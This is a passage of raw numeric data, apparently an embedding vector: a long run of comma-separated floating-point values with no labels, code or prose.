-0.011522323824465275, 0.004716061986982822, 0.024872636422514915, -0.02920287288725376, 0.007188342045992613, 0.010173807851970196, 0.003725276794284582, 0.0013026294764131308, -0.0026764306239783764, -0.019089000299572945, 0.009739285334944725, -0.007813903503119946, -0.001863574841991067, -0.011222654022276402, -0.032993704080581665, 0.023778840899467468, -0.0031146984547376633, -0.00042632786789909005, 0.014668862335383892, 0.023509137332439423, -0.011919387616217136, 0.02882828563451767, -0.020122863352298737, -0.024737784639000893, -0.0003446208720561117, -0.017620615661144257, -0.008435719646513462, 0.003959394060075283, -0.01041354425251484, 0.02398861013352871, 0.02001797780394554, -0.011604733765125275, -0.0031296820379793644, 0.023344319313764572, 0.0035492205061018467, -0.014511535875499249, 0.0033300865907222033, -0.036439910531044006, 0.005011986009776592, -0.0009898485150188208, -0.027824390679597855, 0.020976923406124115, 0.006244380492717028, -0.009859154000878334, 0.008540604263544083, -0.016586752608418465, -0.028858251869678497, 0.003515507560223341, -0.042912792414426804, -0.00309035019017756, -0.015672758221626282, -0.0033563077449798584, -0.01293826662003994, -0.000626498251222074, 0.008660472929477692, 0.017111176624894142, -0.02906802110373974, 0.01714114286005497, 0.02099190652370453, -0.0396164171397686, 0.006278093438595533, 0.010705722495913506, -0.01714114286005497, -0.000691114692017436, 0.008248426020145416, -0.001972205238416791, 0.0026970328763127327, 0.008001198060810566, -0.026850461959838867, -0.0027344918344169855, -0.0047385371290147305, 0.008855258114635944, -0.0024011083878576756, -0.026955345645546913, 0.03128558397293091, 0.0026108776219189167, 0.007311956025660038, 0.011724601499736309, -0.03173508867621422, -0.0071358997374773026, -0.009379681199789047, 0.018834279850125313, -0.02981719747185707, -0.002371141454204917, -0.009634400717914104, -0.03374287858605385, 0.022205570712685585, -0.009237337857484818, 0.02956247702240944, 0.03706922009587288, 0.0055963434278965, 0.004877134691923857, -0.0363200418651104, 0.004304015077650547, 0.01507341768592596, 0.0269403625279665, -0.009424631483852863, -0.00994156301021576, -0.008967634290456772, 0.02361402101814747, -0.01702127419412136, 0.01853461004793644, 0.0062069217674434185, 0.039017077535390854, 0.020317647606134415, -0.022115670144557953, -0.01361252460628748, -0.031345516443252563, 0.015223252587020397, 0.001178078935481608, 0.008945159614086151, 0.03527119755744934, -0.02037758193910122, 0.0005005431012250483, 0.0036110274959355593, 0.0018804313149303198, -0.012383876368403435, 0.031075812876224518, -0.006068324204534292, -0.011514832265675068, -0.04075516387820244, 0.02332933433353901, 0.0198082085698843, -0.00791129656136036, -0.023928675800561905, 0.026685642078518867, -0.009634400717914104, -0.0328138992190361, -0.03518129512667656, 0.010428527370095253, -0.02193586714565754, -0.02255019173026085, 0.03772849589586258, -0.027734488248825073, 0.025172308087348938, -0.0005412795580923557, -0.0023936168290674686, 0.0063792322762310505, 0.04507041722536087, -0.006004644092172384, 0.0039331731386482716, 0.014856156893074512, -0.023074615746736526, -0.00951453298330307, 0.021621214225888252, -0.02661072462797165, -0.0012792176567018032, 0.004547497257590294, -0.053251415491104126, 0.0035398558247834444, -0.026385972276329994, 0.0017128032632172108, 0.0056450399570167065, 0.02058735117316246, -0.0011481118854135275, 0.001453401055186987, -0.002442313125357032, -0.01164968404918909, 0.0021145488135516644, 0.013252920471131802, 0.029142938554286957, 0.019583456218242645, -0.004131704568862915, 0.0021426428575068712, 0.04650883376598358, -0.023479169234633446, -0.002129532163962722, -0.014024571515619755, -0.0037514979485422373, -0.02993706613779068, -0.02063230238854885, -0.028183994814753532, -0.0025303412694483995, 0.010353609919548035, 0.006735090631991625, 0.035121362656354904, 0.025861550122499466, -0.006873688194900751, 0.0004745560581795871, -0.011065326631069183, 0.01447407715022564, 0.017455795779824257, -0.002657701261341572, 0.011312554590404034, -0.015403054654598236, 0.03170512244105339, -0.004892118275165558, -0.0015433022053912282, -0.00579112907871604, 0.013732392340898514, 0.013889719732105732, -0.011589749716222286, -0.0396164171397686, -0.005764908157289028, -0.030566373839974403, -0.0480671189725399, -0.0077614616602659225, 0.02087203785777092, -0.004289031494408846, -0.013402755372226238, -0.021786032244563103, -0.0005122489528730512, -0.012668563053011894, 0.023239433765411377, 0.03952651470899582, 0.0004310102085582912, -0.012885823845863342, -0.015717709437012672, 0.013192986138164997, 0.0028693433851003647, -0.0740785077214241, 0.01254869531840086, -0.017036257311701775, -0.006731344852596521, -0.026745576411485672, -0.0021801015827804804, 0.030236735939979553, -0.05097392201423645, -0.037878330796957016, 0.029247824102640152, 0.03685944899916649, -0.0027195082511752844, -0.015080909244716167, -0.038357801735401154, -0.0034686841536313295, -0.009791728109121323, -0.013492656871676445, 0.033982615917921066, -0.03320347145199776, -0.0011387472040951252, -0.02070721983909607, 0.024737784639000893, -0.001458083395846188, 0.013627507723867893, 0.02160623110830784, 0.01492358185350895, -0.01454150304198265, 0.0031184442341327667, -0.028603533282876015, -0.023509137332439423, -0.008076115511357784, -0.029622411355376244, -0.004483817145228386, 0.01919388398528099, 0.04881629720330238, 0.003228947753086686, -0.02115672454237938, -0.0422535166144371, 0.009791728109121323, -0.004071770701557398, -0.028273895382881165, -0.02722504921257496, 0.006765057798475027, -0.0060346112586557865, 0.0016341398004442453, -0.0010441638296470046, 0.0037308954633772373, 0.022205570712685585, 0.00061011005891487, 0.026550790295004845, -0.010121365077793598, -0.003569822758436203, 0.002637098776176572, -0.013245428912341595, -0.0321546271443367, -0.004798470996320248, 0.014736288227140903, 0.01657176949083805, -0.017995202913880348, -0.0008657663129270077, 0.0028112821746617556, 0.0008081734413281083, -0.015927478671073914, -0.0036166461650282145, -0.004918339196592569, -0.019658373668789864, -0.01579262688755989, -0.000632117094937712, -0.0045812102034688, -0.018115071579813957, 0.021636197343468666, -0.02341923676431179, -0.010361101478338242, -0.0028974374290555716, 0.031495351344347, 0.009387172758579254, 0.023194482550024986, -0.022655077278614044, -0.011574766598641872, 0.003796448465436697, 0.023014681413769722, -0.05241233855485916, -0.005798620637506247, -0.00834581907838583, -0.0004270302306395024, -0.017815401777625084, 0.02403355948626995, 0.0334731750190258, 0.0036091546062380075, -0.013732392340898514, 0.02592148259282112, -0.02013784646987915, -0.014339225366711617, -0.017455795779824257, 0.012698530219495296, -0.031075812876224518, 0.012661071494221687, 0.0009083756594918668, -0.01631704904139042, -0.015612823888659477, -0.01579262688755989, 0.01735091209411621, 0.018100088462233543, -0.01105034351348877, 0.0015376834198832512, 0.013709917664527893, 0.017440812662243843, 0.031345516443252563, -0.029382675886154175, 0.0031671407632529736, 0.005221755243837833, 0.01246628537774086, -0.024093493819236755, -0.013739884831011295, 0.006495354231446981, -0.02497752197086811, -0.008068623952567577, 0.013620016165077686, -0.009859154000878334, -0.024348214268684387, 0.011657175607979298, -0.015777641907334328, 0.019014082849025726, 0.007139645516872406, -0.01759064756333828, -0.009319746866822243, 0.005854809191077948, 0.033323340117931366, -0.024513032287359238, 0.011619716882705688, -0.018594544380903244, -0.019178900867700577, -0.005446508061140776, -0.0008170699002221227, 0.033323340117931366, -0.028393764048814774, 0.004506292752921581, -0.01669163815677166, -0.005049445200711489, 0.012368892319500446, 0.019493555650115013, -0.003013559617102146, -0.013530115596950054, 0.020842071622610092, 0.004843421746045351, -0.005536409094929695, 0.010421035811305046, 0.0048696426674723625, 0.0004677666584029794, -0.016676653176546097, -0.002078962977975607, 0.011102785356342793, -0.016272099688649178, -0.024348214268684387, 0.01598741114139557, 0.043572064489126205, -0.0036335026379674673, -0.024393165484070778, 0.0031690136529505253, 0.0033619264140725136, 0.012144139967858791, 0.004978273529559374, 0.009297272190451622, 0.018429724499583244, -0.03976625204086304, 0.029232840985059738, 0.001862638397142291, 0.04776744917035103, -0.025966433808207512, -0.012473776936531067, 0.000202511582756415, -0.008413244038820267, -0.032454296946525574, 0.005633802153170109, -0.004236589185893536, -0.013230444863438606, -0.013552590273320675, -0.001879494870081544, -0.024333231151103973, -0.028798319399356842, -0.010451002977788448, -0.0014730669790878892, 0.011462390422821045, 0.0008395451586693525, -0.003277644282206893, 0.0015704598044976592, 0.034342218190431595, -0.008585554547607899, -0.0039331731386482716, 0.053011681884527206, -0.02115672454237938, -0.0024666613899171352, 0.0002905397559516132, -0.005101887509226799, -0.03539106622338295, -0.011469881981611252, -0.0030547643546015024, 0.00040080907638184726, 0.017935268580913544, -0.02661072462797165, 0.004742282908409834, 0.01424932386726141, -0.00214826175943017, 0.018429724499583244, -0.003811432048678398, -0.022325439378619194, -0.00887773372232914, 0.015942461788654327, -0.010833082720637321, -0.022040752694010735, -0.019448604434728622, 0.011132752522826195, 0.09829186648130417, -0.01976325735449791, 0.007813903503119946, -0.021216658875346184, 0.008398260921239853, 0.00851063709706068, -0.001944111194461584, 0.020647285506129265, -0.015732692554593086, -0.012249024584889412, 0.014406651258468628, -0.012601137161254883, -0.018219955265522003, 0.005854809191077948, 0.02722504921257496, 0.006944859866052866, -0.01968833990395069, -0.01607731357216835, 0.028678450733423233, 0.005345369689166546, 0.01513335108757019, -0.012009288184344769, 0.018849262967705727, -0.0014281164621934295, 0.031555283814668655, -0.01804015412926674, -0.02948755957186222, -0.01985315978527069, -0.022070718929171562, -0.014691337943077087, 0.0023374285083264112, 0.0027906799223273993, -0.0132229533046484, -0.0060346112586557865, -0.0021351510658860207, -0.0016116644255816936, 0.019343718886375427, -0.0013475799933075905, -0.03095594421029091, -0.008922684006392956, -0.006356756668537855, -0.003925681114196777, -0.02747976966202259, -0.008585554547607899, 0.01570272445678711, -0.00381330493837595, 0.04039556160569191, 0.0003834843810182065, -0.0188192967325449, -0.0030753668397665024, 0.007499250117689371, -0.01631704904139042, 0.039346713572740555, 0.007843870669603348, 0.01143991481512785, 0.024378180503845215, 0.009282288141548634, -0.0071358997374773026, -0.009349714033305645, -0.014346716925501823, -0.015388071537017822, 0.011192686855793, -0.011222654022276402, -0.00020672570099122822, 0.016871439293026924, -0.005959693808108568, -0.03209469094872475, -0.002230671001598239, -0.01631704904139042, 0.03527119755744934, 0.013957145623862743, 0.01271351333707571, -0.006877433974295855, -0.006244380492717028, 0.019014082849025726, 0.002161372220143676, 0.008892716839909554, 0.02394365891814232, -0.015050942078232765, -0.024018576368689537, 0.03092597797513008, 0.028633499518036842, -0.000713121728040278, 0.028408747166395187, -0.015882527455687523, 0.0369793176651001, -0.016002396121621132, -0.0031989808194339275, -0.007746478077024221, -0.004611177369952202, -0.001636012690141797, 0.01607731357216835, 0.025636795908212662, 0.007398111280053854, 0.011904403567314148, 0.02658075839281082, 0.01804015412926674, -0.0012342671398073435, -0.015103384852409363, -0.016916390508413315, 0.004408899694681168, -0.011784535832703114, 0.013267903588712215, -0.01078813150525093, 0.004172909539192915, 0.00902007706463337, -0.0069411140866577625, 0.013792326673865318, 0.015013483352959156, -0.01406952179968357, -0.028858251869678497, -0.032993704080581665, 0.012758464552462101, -0.006525321397930384, -0.0011050343746319413, 0.026745576411485672, 0.007828887552022934, -0.013365296646952629, -0.01813005469739437, -0.03031165339052677, -0.009312255308032036, -0.028453698381781578, 0.03709918633103371, -0.021111775189638138, 0.00044318431173451245, 0.003343197051435709, -0.00043171257129870355, -0.01472130510956049, 0.019613422453403473, 0.019178900867700577, 0.040365591645240784, 0.008480669930577278, 0.015208269469439983, -0.015522923320531845, 0.017770450562238693, -0.02906802110373974, 0.019868142902851105, 0.011005393229424953, -0.006439166143536568, -0.00791129656136036, -0.019388670101761818, 0.021171709522604942, 0.0169014073908329, -0.005379082169383764, 0.01290080789476633, 0.005071920342743397, 0.014504044316709042, 0.010608329437673092, 0.007622864097356796, 0.03179502114653587, 0.00671636126935482, -0.022670060396194458, 0.011409947648644447, 0.022505242377519608, 0.007102186791598797, 0.01562780700623989, 0.014901107177138329, -0.026341021060943604, 0.003105333773419261, 0.001403768197633326, 0.005307910498231649, 0.0014449728187173605, 0.006289330776780844, -0.009477074258029461, -0.001819560769945383, 0.029352707788348198, 0.006581509485840797, -0.04531015455722809, -0.006884925998747349, -0.025726698338985443, 0.0030266703106462955, -0.006154479458928108, -0.008975125849246979, 0.0031671407632529736, 0.013515131548047066, -0.01902906596660614, -0.0004935195902362466, 0.024243328720331192, 0.020392565056681633, -0.034012582153081894, 0.011627208441495895, 0.01443661842495203, 0.011192686855793, 0.015612823888659477, 0.011447406373918056, -0.025232242420315742, -0.0002830479934345931, 0.0018963513430207968, -0.029907098039984703, 0.011162719689309597, 0.011979321017861366, 0.053700923919677734, -0.012099189683794975, -0.015972428023815155, -0.0018429724732413888, -0.013702426105737686, -0.02070721983909607, -0.020452499389648438, -0.021801017224788666, 0.01582259312272072, 0.004959543701261282, 0.003022924531251192, -0.007611626293510199, 0.005180550739169121, -0.005015732254832983, -0.029997000470757484, -0.009499548934400082, 0.002614623634144664, 0.0036110274959355593, -0.0053228940814733505, -0.013065625913441181, 0.014504044316709042, 0.01591249369084835, -0.018669461831450462, -0.004888372030109167, 0.010743181221187115, 0.004187892656773329, -0.028963137418031693, 0.013515131548047066, -0.007634101435542107, 0.01472130510956049, 0.02767455391585827, 0.006154479458928108, 0.00875786505639553, 0.00815852452069521, 0.012668563053011894, 0.03464189171791077, -0.03626010939478874, -0.004083008039742708, 0.01096793357282877, -0.031495351344347, -0.012391367927193642, -0.022685043513774872, 0.0072295465506613255, -0.007709019351750612, -0.007184596266597509, 0.024572966620326042, -0.005585105624049902, -0.014803714118897915, -0.0035773145500570536, 0.013252920471131802, 0.006843721028417349, -0.009626909159123898, 0.0173958633095026, -0.004274047911167145, -0.00028702797135338187, -0.0014552740612998605, -0.018219955265522003, -0.011162719689309597, 0.013035659678280354, -0.007214562967419624, 0.012054238468408585, 0.011462390422821045, -0.005656277295202017, -0.008967634290456772, 0.0209619402885437, 0.014698829501867294, -0.007941263727843761, 0.027255015447735786, 0.01474377978593111, 0.011777044273912907, -0.023554088547825813, -0.0074805207550525665, 0.0031559031922370195, -0.02550194412469864, 0.021291576325893402, -0.0008400133810937405, -0.014728796668350697, 0.008293376304209232, 0.011807010509073734, 0.02469283528625965, -0.0008400133810937405, 0.006757565774023533, -0.00029943621484562755, -0.009694335050880909, 0.005053190980106592, 0.02587653324007988, -0.02042253315448761, 0.0005380018847063184, 0.0022980968933552504, -0.024662867188453674, 0.06850463896989822, -0.01874437928199768, -0.020152829587459564, -0.009581958875060081, -0.050374582409858704, -0.023479169234633446, -0.019133949652314186, -0.01685645617544651, 0.00019338101265020669, 0.001361627015285194, 0.01207671407610178, -0.011424931697547436, -0.022984713315963745, 0.048696428537368774, 0.005120616871863604, -0.015275695361196995, 0.015897510573267937, 0.001009514438919723, 0.012526219710707664, 0.013028167188167572, 0.049145933240652084, 0.015245728194713593, -0.0006414817762561142, -0.019328735768795013, 0.008847766555845737, -0.004090500064194202, -0.024962538853287697, 0.008952651172876358, -0.032903801649808884, 0.007806411944329739, 0.0015648410189896822, -0.014091997407376766, -0.019163917750120163, -0.008323343470692635, -0.014406651258468628, -0.005873538553714752, -0.008555588312447071, -0.009806711226701736, 0.006263109855353832, 0.004899609833955765, -0.02550194412469864, -0.007641593459993601, -0.02034761570394039, -0.020122863352298737, 0.006708869244903326, 0.011424931697547436, 0.006154479458928108, 0.002841249341145158, -0.018279889598488808, 0.02153131365776062, 0.013672458939254284, 0.02124662697315216, -0.0002947538741864264, 0.012825890444219112, -0.007233292330056429, 0.019628405570983887, 0.011267604306340218, -0.010795623995363712, -0.012234041467308998, -0.023718906566500664, 0.037908297032117844, -0.0025359601713716984, 0.00918489508330822, 0.00477599585428834, -0.004614923149347305, -0.013552590273320675, 0.0037346414756029844, 0.010031464509665966, -0.029412642121315002, -0.016766555607318878, -0.0034312251955270767, -0.0028375033289194107, 0.03392267972230911, -0.00024207743990700692, -0.003326340578496456, 0.010256216861307621, 0.029637394472956657, 0.015567873604595661, -0.0243631973862648, -0.01615223102271557, -0.0009814202785491943, -0.025651780888438225, -0.007716510910540819, 0.011994305066764355, -0.01492358185350895, 0.020437516272068024, 0.010975426062941551, 0.01702127419412136, -0.021756066009402275, -0.0060907993465662, 0.01343272253870964, 0.013709917664527893, 0.009634400717914104, -0.015762658789753914, 0.00067004410084337, 0.01796523667871952, -0.003944410476833582, -0.005439016502350569, 0.04084506630897522, 0.00824093446135521, -0.011807010509073734, -0.005289181135594845, -0.0026614470407366753, -0.03635001182556152, 0.00598591472953558, -0.0090800104662776, 0.01546298898756504, -0.004663619678467512, -0.0003385338350199163, 0.012376384809613228, 0.0026876681949943304, 0.014406651258468628, 0.016991307958960533, 0.02193586714565754, 0.0010497826151549816, -0.018070120364427567, -0.005723703186959028, -0.021636197343468666, 0.013335329480469227, 0.006210667546838522, -0.005761161912232637, 0.011694634333252907, 0.009701826609671116, 0.025172308087348938, 0.007544200401753187, -0.002889945637434721, 0.0004003408248536289, 0.03581060469150543, -0.018564576283097267, 0.007649085018783808, 0.001446845824830234, 0.003120317356660962, -0.032004792243242264, -0.03239436075091362, -0.010316151194274426, -0.0015545397764071822, 0.010593346320092678, 0.009012585505843163, -0.019748274236917496, 0.020197780802845955, -0.006813753861933947, -0.017440812662243843, -0.015283186919987202, 0.01043601892888546, -0.017216060310602188, 0.012046746909618378, -0.004678602796047926, -0.019118966534733772, -0.004330236464738846, 0.00279817171394825, 0.00898261833935976, 0.02108180709183216, -0.002580910688266158, -0.005881030112504959, 0.0024591695982962847, -0.01193437073379755, -0.010091397911310196, -0.013927178457379341, -0.013140544295310974, 0.022984713315963745, -0.00767905218526721, -0.014346716925501823, -0.006914892699569464, -0.01841474138200283, -0.014054538682103157, -0.030236735939979553, -0.018309857696294785, -0.019583456218242645, 0.0016397585859522223, 0.020227747038006783, 0.010600837878882885, 0.005963439587503672, 0.0053228940814733505, 0.000993594410829246, -0.01066077221184969, 0.007948755286633968, -0.0007622864213772118, -0.017650581896305084, 0.011836977675557137, 0.0038470178842544556, -0.026670658960938454, 0.03742882236838341, 0.0064878626726567745, 0.015125859528779984, 0.01433173380792141, -0.01598741114139557, 0.005030715838074684, 0.008885225281119347, -0.006259364075958729, 0.024213362485170364, -0.011372488923370838, 0.01874437928199768, 0.001754944329150021, -0.011200178414583206, -0.027494752779603004, -0.01449655182659626, -0.012338926084339619, 0.0011462389957159758, -0.025277191773056984, 0.014593944884836674, 0.004180401097983122, -0.019958043470978737, 0.011507340706884861, -0.004367695190012455, 0.01193437073379755, -0.0035829334519803524, 0.007948755286633968, 0.011724601499736309, 0.019283786416053772, 0.012046746909618378, 0.015582856722176075, 0.004764758050441742, 0.0005066301673650742, 0.02813904359936714, 0.019163917750120163, 0.015103384852409363, 0.02082708850502968, -0.0023692685645073652, -0.01048097014427185, -0.0008348628180101514, -0.009402156807482243, 0.007716510910540819, 0.0029030563309788704, 0.009454598650336266, -0.004865896888077259, -0.020812103524804115, 0.019014082849025726, 0.00873539038002491, -0.019298769533634186, -0.0024928825441747904, -0.006551542319357395, -0.011657175607979298, -0.006364248692989349, 0.004622414708137512, 0.008473178371787071, -0.011994305066764355, 0.00025120802456513047, 0.0061432416550815105, -0.0014758763136342168, 0.013005692511796951, 0.015852561220526695, 0.0005450253956951201, -0.024093493819236755, -0.006188192404806614, -0.004408899694681168, 0.0071358997374773026, 0.006896163336932659, -0.012106681242585182, -0.010525920428335667, 0.013874736614525318, 0.0027419833932071924, -0.012496252544224262, -0.013777343556284904, 0.011821994557976723, 0.007933772169053555, 0.008068623952567577, -0.025651780888438225, 0.007244530133903027, -0.0077914283610880375, 0.0012623613001778722, -0.016796521842479706, -0.00425531854853034, 0.015852561220526695, 0.016511835157871246, -0.0073157018050551414, -0.004322744440287352, -0.012278991751372814, -0.011762060225009918, 0.0018027042970061302, -0.0035922981332987547, 0.004854659084230661, 0.007821395993232727, -0.019223852083086967, -0.011664667166769505, 0.0001812068949220702, -0.012353909201920033, 0.000582952459808439, 0.003283262951299548, 0.005933472421020269, -0.0023692685645073652, -0.009357205592095852, 0.02460293471813202, -0.007694035768508911, -0.0016285208985209465, 0.01697632484138012, -0.002213814528658986, 0.011372488923370838, -0.0029405150562524796, -0.004959543701261282, 0.0031839972361922264, 0.004423883277922869, -0.00004492128573474474, -0.0069411140866577625, -0.00728948088362813, -0.0028993103187531233, 0.015208269469439983, -0.01956847310066223, 0.01033113431185484, 0.016466883942484856, 0.009154928848147392, 0.013739884831011295, -0.0024760260712355375, 0.005510188173502684, -0.010038956068456173, -0.031075812876224518, 0.024138445034623146, -0.021306559443473816, -0.014271799474954605, 0.0020396311301738024, 0.0031278091482818127, 0.04315252602100372, -0.01562780700623989, 0.0030641290359199047, 0.0019216359360143542, -0.01697632484138012, -0.010023972019553185, -0.011507340706884861, -0.009791728109121323, 0.00482843816280365, -0.0033563077449798584, 0.01207671407610178, -0.0027457294054329395, -0.007428078446537256, -0.028978120535612106, 0.00642792833968997, 0.029922083020210266, -0.01754569821059704, -0.015657775104045868, -0.020197780802845955, 0.02037758193910122, 0.005633802153170109, -0.0023617767728865147, -0.010421035811305046, -0.005914743058383465, -0.015852561220526695, 0.007203325629234314, -0.005124362651258707, -0.009716810658574104, -0.022909795865416527, 0.01493107434362173, 0.0003802067367359996, -0.006937368307262659, 0.02481270395219326, 0.0021426428575068712, 0.006087053567171097, 0.004641144070774317, -0.0269403625279665, 0.015582856722176075, 0.0038301614113152027, 0.00008674051059642807, -0.00294800684787333, 0.01985315978527069, 0.005551392678171396, -0.00026221154257655144, 0.03814803436398506, -0.0029892115853726864, -0.021306559443473816, 0.010256216861307621, 0.010391068644821644, -0.014346716925501823, 0.005547646898776293, -0.013425230979919434, 0.0022437814623117447, -0.017830384895205498, 0.003899460192769766, 0.01813005469739437, 0.0023467931896448135, 0.0015742057003080845, 0.012601137161254883, 0.014653879217803478, 0.013732392340898514, -0.006731344852596521, 0.016916390508413315, 0.0040492950938642025, -0.008188491687178612, 0.0006161971250548959, -0.005274197552353144, 0.004723553545773029, -0.016347017139196396, 0.018070120364427567, -0.000059582889662124217, -0.02136649377644062, 0.008930175565183163, 0.011394964531064034, -0.000496797205414623, -0.013148035854101181, 0.006364248692989349, 0.009821695275604725, 0.0062069217674434185, -0.010975426062941551, -0.00013848046364728361, -0.020512433722615242, 0.0049108476378023624, -0.02788432314991951, -0.013440214097499847, 0.00038325024070218205, -0.004577464424073696, -0.000326827954268083, -0.008443211205303669, 0.0011359378695487976, 0.0044575962238013744, 0.006697631906718016, -0.02001797780394554, -0.007405602838844061, -0.03440215438604355, 0.006547796539962292, -0.005749924574047327, 0.0040605328977108, 0.00395564828068018, 0.019403653219342232, -0.024543000385165215, 0.023569071665406227, 0.012473776936531067, 0.006839975249022245, -0.03679951652884483, -0.012593645602464676, 0.011162719689309597, 0.009589450433850288, 0.0010085779940709472, 0.011589749716222286, 0.001096606138162315, 0.026221154257655144, 0.028843268752098083, -0.007379381917417049, -0.0022007040679454803, 0.0005717147723771632, 0.013230444863438606, 0.012121664360165596, 0.003418114734813571, 0.0063792322762310505, -0.023149533197283745, 0.012174107134342194, -0.005704973824322224, -0.0019403654150664806, 0.007360652554780245, 0.016991307958960533, -0.007622864097356796, 0.02054240182042122, 0.007173358462750912, 0.0017399608623236418, 0.012601137161254883, 0.02001797780394554, -0.025621812790632248, -0.0028581058140844107, 0.015050942078232765, -0.01759064756333828, -0.013627507723867893, -0.016826488077640533, 0.0003041185555048287, -0.0035791874397546053, 0.025951450690627098, 0.015837576240301132, -0.007798920385539532, -0.000023733655325486325, 0.0018045773031190038, 0.007323193829506636, -0.022400356829166412, 0.0009626909159123898, -0.014946057461202145, 0.03212466090917587, 0.006102037150412798, 0.001992807723581791, -0.008832782506942749, -0.015597840771079063, 0.0073943655006587505, -0.02415342815220356, 0.037908297032117844, -0.01771051622927189, 0.026955345645546913, -0.010166316293179989, 0.019673356786370277, -0.015268202871084213, -0.004922084975987673, 0.02144141122698784, -0.005547646898776293, 0.001770864357240498, -0.003601662814617157, -0.003137173829600215, -0.024093493819236755, -0.0008741945493966341, 0.011282587423920631, 0.020976923406124115, 0.04339226335287094, -0.0007309146458283067, -0.003725276794284582, -0.004142942372709513, -0.012915791012346745, -0.011732093058526516, -0.004599939566105604, -0.009544500149786472, -0.0024816449731588364, 0.0328138992190361, 0.0009537944570183754, 0.017485763877630234, -0.01657176949083805, 0.005274197552353144, -0.019178900867700577, -0.004056787118315697, 0.0018720030784606934, -0.009851662442088127, -0.004944560583680868, -0.007941263727843761, 0.0009477073908783495, 0.04560982435941696, -0.002359903883188963, -0.009312255308032036, 0.0028974374290555716, 0.006094545125961304, 0.0055588847026228905, 0.0045662266202270985, -0.00285061402246356, -0.022220555692911148, 0.0024816449731588364, -0.0025191036984324455, -0.006203175988048315, -0.03137548267841339, 0.00041766552021726966, -0.003537982702255249, -0.014166914857923985, 0.020122863352298737, -0.025861550122499466, 0.010308659635484219, 0.009349714033305645, 0.01318549457937479, 0.008675456047058105, -0.002489136764779687, 0.013417738489806652, 0.010952950455248356, -0.001052592066116631, -0.017036257311701775, 0.020287681370973587, -0.037009283900260925, -0.0042216056026518345, 0.0022325438912957907, -0.011462390422821045, -0.0169014073908329, -0.006742582190781832, 0.028693433851003647, -0.012234041467308998, 0.0002197192225139588, -0.005851062946021557, -0.0142118651419878, -0.013342821039259434, 0.005585105624049902, -0.010061431676149368, 0.005641293711960316, -0.026685642078518867, 0.014219356700778008, 0.001889795996248722, 0.003888222388923168, -0.006113274488598108, -0.022235538810491562, -0.004259064327925444, -0.010278692469000816, -0.01820497214794159, -0.008173508569598198, -0.003682199167087674, -0.008458195254206657, 0.022490257397294044, -0.005794874858111143, 0.00728948088362813, 0.018384775146842003, 0.0025678002275526524, 0.0074243322014808655, -0.004476325586438179, 0.01763559877872467, -0.006278093438595533, 0.006929876282811165, -0.01279592327773571, 0.003824542509391904, 0.0033057383261621, 0.0005347242695279419, -0.009297272190451622, 0.021920884028077126, 0.009424631483852863, 0.01096793357282877, -0.013492656871676445, -0.030776143074035645, -0.0049108476378023624, 0.021756066009402275, 0.013844769448041916, 0.00016072162543423474, -0.01935870386660099, 0.0028918187599629164, -0.004678602796047926, -0.007270751520991325, -0.0012614247389137745, -0.027944257482886314, 0.007581659127026796, -0.008053639903664589, -0.0052779437974095345, 0.009596941992640495, 0.01997302658855915, -0.019658373668789864, 0.005588851403445005, 0.010023972019553185, -0.0029554986394941807, -0.025576861575245857, 0.029682345688343048, 0.014878631569445133, 0.009784236550331116, -0.0042852857150137424, 0.00260338606312871, 0.009754269383847713, -0.017006291076540947, -0.010001497343182564, 0.024018576368689537, -0.0016004268545657396, 0.002893691649660468, -0.004536259453743696, 0.0041054836474359035, 0.0002666597720235586, 0.04519028589129448, 0.03305363655090332, -0.002442313125357032, 0.004011836368590593, 0.010428527370095253, 0.0077689532190561295, 0.009507041424512863, -0.0016500597121194005, 0.00420287624001503, -0.003272025380283594, 0.03164518624544144, -0.002683922415599227, 0.020812103524804115, -0.006648935377597809, -0.00641669100150466, -0.010833082720637321, 0.005015732254832983, 0.006420436780899763, -0.0035941710229963064, -0.00884027499705553, 0.016062330454587936, 0.004382678307592869, 0.009754269383847713, -0.0026970328763127327, -0.027404852211475372, -0.009574467316269875, 0.012623612768948078, 0.022999698296189308, 0.0052367388270795345, 0.00020040453819092363, 0.0018991606775671244, 0.009776744060218334, -0.0023936168290674686, 0.02099190652370453, -0.011200178414583206, -0.0067463284358382225, -0.017365895211696625, -0.005038207396864891, -0.0008006816497072577, 0.02021276392042637, 0.02160623110830784, -0.035780638456344604, 0.01595744490623474, 0.0025359601713716984, -0.014301766641438007, -0.007233292330056429, -0.003862001234665513, -0.006813753861933947, -0.005352861247956753, -0.001463702297769487, -0.00961941760033369, -0.019343718886375427, -0.018849262967705727, 0.0017998949624598026, 0.004719807766377926, 0.002727000042796135, -0.004154179710894823, 0.014226849190890789, 0.01230146735906601, -0.03317350521683693, -0.010840574279427528, -0.027000296860933304, -0.001106907264329493, -0.0004162608238402754, 0.005498950369656086, 0.01751573011279106, -0.013095593079924583, -0.011537307873368263, -0.0053004189394414425, -0.0001388316450174898, 0.0053865741938352585, -0.007652830798178911, -0.02875336818397045, -0.03440215438604355, -0.005446508061140776, -0.006761311553418636, -0.02058735117316246, -0.004184146877378225, 0.006514083594083786, 0.011799518950283527, 0.003661596914753318, 0.01082559023052454, 0.0031465385109186172, -0.009334730915725231, -0.008810307830572128, -0.006248126272112131, -0.016391966491937637, -0.013837276957929134, 0.006173208821564913, -0.023029664531350136, -0.013912195339798927, -0.01631704904139042, -0.026520824059844017, 0.007858854718506336, -0.0033937664702534676, 0.016511835157871246, -0.001846718369051814, -0.009304763749241829, -0.021636197343468666, 0.012541202828288078, -0.00940964836627245, 0.017006291076540947, -0.0007421522750519216, -0.0020002995152026415, -0.007383127696812153, 0.009649384766817093, -0.014256815426051617, -0.0014346716925501823, -0.01532064564526081, -0.011267604306340218, 0.012016779743134975, 0.0002453550696372986, -0.009327239356935024, 0.0017193584935739636, 0.028603533282876015, 0.010428527370095253, 0.007866346277296543, 0.014459093101322651, 0.02780940569937229, -0.013792326673865318, 0.002515357919037342, 0.007562929764389992, 0.0034855403937399387, -0.02280491217970848, 0.007371889892965555, -0.013994604349136353, -0.0030379078816622496, 0.006918638478964567, -0.0011696506990119815, 0.005551392678171396, -0.020512433722615242, -0.0193137526512146, -0.02767455391585827, -0.012983216904103756, -0.017410846427083015, 0.011672159656882286, 0.004360203165560961, 0.02833382971584797, -0.007881329394876957, 0.008166016079485416, 0.003959394060075283, 0.0193137526512146, 0.008907700888812542, 0.001263297745026648, 0.030416538938879967, -0.0007889757980592549, 0.018939165398478508, 0.001383165828883648, -0.010848065838217735, -0.014256815426051617, 0.009499548934400082, -0.010451002977788448, 0.009964038617908955, -0.017560681328177452, -0.00748426653444767, 0.003993107005953789, 0.00018319689843337983, 0.00044248197809793055, 0.022939763963222504, -0.016886422410607338, 